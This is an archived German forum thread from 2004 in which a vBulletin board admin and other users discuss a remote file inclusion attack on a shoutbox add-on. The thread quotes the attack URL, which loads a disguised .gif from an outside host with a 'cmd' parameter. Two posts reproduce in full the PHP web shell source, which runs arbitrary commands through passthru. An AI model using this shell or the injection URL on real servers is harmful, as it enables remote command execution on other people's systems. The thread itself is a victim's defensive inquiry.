PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Frage wegen Url-Link eines Gastes

Mäuschen
15.06.2004, 19:17
Hallo,

also ich hoffe ich hab jetzt erstmal das richtige Forum getroffen, sonst nicht sauer sein, wußte nicht wohin. :D


***************************************

Heute fiel einem meiner Moderatoren ein Link auf, der mir auch komisch vorkommt, aber ich hab da nicht so den Durchblick.

Vielleicht kennt sich ja jemand damit aus. :confused:

Gast Aufenthaltsort unbekannt
/shoutbox/expanded.php?conf=http://www.cavaleirasex.hpg.com.br/cmd.gif?&cmd=uname%20-a 220.97.105.59

Wenn ich diesen Teil des Links "http://www.cavaleirasex.hpg.com.br/cmd.gif" eingebe öffnet sich zum Beispiel ein Script. :rolleyes:

Kann mir jemand das Ganze erklären?

Liebe Grüße euer Mäuschen
h75
22.07.2004, 07:54
gif ist doch ne JPG Datei oder? Wie kann sich da ein Script öffnen?
MrZeropage
22.07.2004, 09:51
sieht mir auf den ersten Blick nach einem Exploit in dem Shoutbox-Hack aus, und es kann durchaus sein, dass da ein Script aufgerufen wird, weil ja primär ein php-File aufgerufen und somit interpretiert wird ...
Hoffi
22.07.2004, 11:13
Da hat wohl einer Probiert Das Board zu hacken per JPG-Script. Wichtig: Hat es funktioniert? Man müsste mal sehen was das Script macht.
Holger
22.07.2004, 13:26
wenn ein neuerer kernel drauf ist dann passiert garnix ;)
wenn nicht dann hat der user jetzt halt ne shell dort :D
vectra-a-x.de
22.07.2004, 15:14
Habe das gleiche in Grün, habe mal ein Screene geschossen im Anhang....

der Source-Code (auch zu sehen http://teranova.fr/2003/lila.jpg?&cmd=id) sieht so aus:

<font color="#808080"><br></font><font color="#008000"><center><b><font face="verdana" size="2">CMD</font></b> <font face="verdana" size="2"> - System CoManD<br><br></font></center></font><font face="Verdana" size="1"><font color="#008000"><br>
<b>#</b> CMD PHP : <h1>PHP SHELL</h1><br>
<b>#</b></b></font><br>
<br>
<br>
<hr color="#000000" width=80% height=115px>
<br>
<div align="center">
<table border="1" cellpadding="0" cellspacing="0" width="633" height="17" bordercolorlight="#000080" bordercolordark="#000080">
<tr>
<td width="633" height="17">
<pre><font color="gray" font face="Tahoma" size="2">
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
</tr>
</table>
</div>

<br>
<hr color="#000000" width=80% height=115px>
<p align="left">
<br>
<b> <font face="Verdana" size="1" color="#008000">PHP SHELL</font></b> <font face="Verdana" size="1" color="#008000"><br><b>
#<a href="mailto:PHPSHELL@bol.com.br">Contact
Us</font></a></b><br><font face="Verdana" size="1" color="#008000"><b>#
:D </b>
</font>
Christian
22.07.2004, 15:51
Habe das gleiche in Grün, habe mal ein Screene geschossen im Anhang....

der Source-Code (auch zu sehen http://teranova.fr/2003/lila.jpg?&cmd=id) sieht so aus:

<font color="#808080"><br></font><font color="#008000"><center><b><font face="verdana" size="2">CMD</font></b> <font face="verdana" size="2"> - System CoManD<br><br></font></center></font><font face="Verdana" size="1"><font color="#008000"><br>
<b>#</b> CMD PHP : <h1>PHP SHELL</h1><br>
<b>#</b></b></font><br>
<br>
<br>
<hr color="#000000" width=80% height=115px>
<br>
<div align="center">
<table border="1" cellpadding="0" cellspacing="0" width="633" height="17" bordercolorlight="#000080" bordercolordark="#000080">
<tr>
<td width="633" height="17">
<pre><font color="gray" font face="Tahoma" size="2">
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
</tr>
</table>
</div>

<br>
<hr color="#000000" width=80% height=115px>
<p align="left">
<br>
<b> <font face="Verdana" size="1" color="#008000">PHP SHELL</font></b> <font face="Verdana" size="1" color="#008000"><br><b>
#<a href="mailto:PHPSHELL@bol.com.br">Contact
Us</font></a></b><br><font face="Verdana" size="1" color="#008000"><b>#
:D </b>
</font>


IP Adresse merken und wenn sich tatsächlich raustellt, das der jenige versucht dein Board zu hacken, Anzeige machen.
MrZeropage
22.07.2004, 16:07
wie kann man diesen Exploit dichtmachen ?

@Holger:
ab welcher Version (von was ? PHP ?) ist man sicher ?
martin
22.07.2004, 16:07
es geht nicht um das forum, es geht um den server.


/shoutbox/expanded.php?conf=http://www.cavaleirasex.hpg.com.br/cmd.gif?&cmd=uname%20-a


wenn das funktionieren sollte, dann hat dieses "shoutbox" ding eine riesen sicherheitslücke.
MrZeropage
22.07.2004, 16:08
betrifft dies nur den Shoutbox-Hack ?

Oder klappt sowas auch mit Original-vBulletin-Files ?
h75
22.07.2004, 20:24
AiAiAi. Wenn das stimmt, bin ich froh, den noch net eingebaut zu haben. Ist ja krass. einfach ?conf= dranhängen und schon gehts..? :confused:
Mäuschen
29.08.2004, 19:54
Kennt jemand schon eine Lösung? Ich hatte schon wieder Besuch. :eek: Einer meiner Moderatoren hat ein Bild gemacht. Darauf zeigt sich:

Gast:

Aufenthaltsort unbekannt
/shoutbox/expanded.php

IP: 201.0.138.142

Langsam bekomm ich ein ungutes Gefühl, aber die Shoutbox ausbauen möchte ich auch nicht. Kann man denn gegen die störenden Gäste gar nichts tun?

Bitte helft mir weiter. :)

Liebe Grüße Mäuschen.
h75
29.08.2004, 20:26
Sperre doch einfach mal derern IP im ACP und gut ist.

/admincp/index.php?loc=options.php%3Fdogroup%3Dbanning&amp;do%3Doptions

Oder deaktiviere den Hack einfach mal ein paar Tage!

Es sollte was gegen diese Schwachstelle getan werden. Denn das kann doch net so weitergehen.. Jetzt wo wir darüber schreiben, werden einige drauf aufmerksam und probieren das natürlich aus..
Mäuschen
29.08.2004, 22:47
Hab beide IPs gesperrt, doch auf Dauer ist das auch keine Lösung.

IP: 220.97.105.59
IP: 201.0.138.142

Der Autor sollte mal was dagegen tun. Hab im englischen Forum auch schon gepostet. Hoffe den Wirrwarr versteht einer. :D Bin nicht grad gut mich englisch auszudrücken. :( Hoffen wir mal auf eine positive helfende Antwort.

Liebe Grüße Mäuschen.
Mäuschen
30.08.2004, 21:59
Post aus dem englischen Forum:
There are no known security exploits.

Soll wohl heißen das Hacker keine Sicherheitslücke finden können. :rolleyes:

Außerdem wurde der Thread geschlossen, weil seit heute eine neue Version der Shoutbox online ist.

[vB 3.0.3] - Shoutbox Hack 1.04
http://www.vbulletin.org/forum/showthread.php?t=68861

Vielleicht ist die neuere Version ja sicherer. :D

Liebe Grüße Mäuschen.
Mäuschen
18.10.2004, 22:40
Hallo,

irgendwie schein ich solche User anzuziehen, denn gerade besuchte ein Gast diese spezielle Adresse.

Gast Aufenthaltsort unbekannt
http://www.*****.de/arcade/images/arcade/apples1.gif
141.157.228.157

"apples1.gif" ist eine Arcade Bilddatei, kann mir jemand sagen, wie ein Gast wissen kann, dass eine solche Datei in meinem Forum existiert bzw wo sie liegt?

Muss ich mir da irgendwie Gedanken machen oder ist sowas normal? Kann man sowas eigentlich vermeiden?

Freu mich auf Antworten.

Danke Mäuschen.
h75
18.10.2004, 23:45
Scheint jemand aus NewYork (Reston, VA) zu sein... Denn die IP löst sich wie folgt auf:

pool-141-157-228-157.ny325.east.verizon.net

Aber schon komisch, das ne gif-Datei unter Wer ist Online erscheint :confused:

Hier track mal: http://visualtracking.symantec.com/vt_main.asp?productid=nis2004&langid=ge&venid=sym&go=141.157.228.157